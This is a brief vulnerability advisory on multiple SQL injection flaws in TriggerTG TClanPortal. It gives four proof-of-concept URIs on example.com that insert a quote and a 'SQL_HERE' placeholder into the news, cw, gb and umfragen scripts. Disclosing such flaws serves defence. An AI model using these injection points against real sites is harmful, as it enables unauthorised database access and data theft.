TriggerTG TClanPortal Multiple SQL Injection Vulnerabilities

info
discussion
exploit
solution
references

TriggerTG TClanPortal Multiple SQL Injection Vulnerabilities

No exploit is required.

The following proof of concept URI are available:
http://www.example.com/news/index.php?action=com&id='SQL_HERE
http://www.example.com/cw/index.php?action=details&id='SQL_HERE
http://www.example.com/gb/index.php?von='SQL_HERE
http://www.example.com/umfragen/index.php?action=vote&insert='SQL_HERE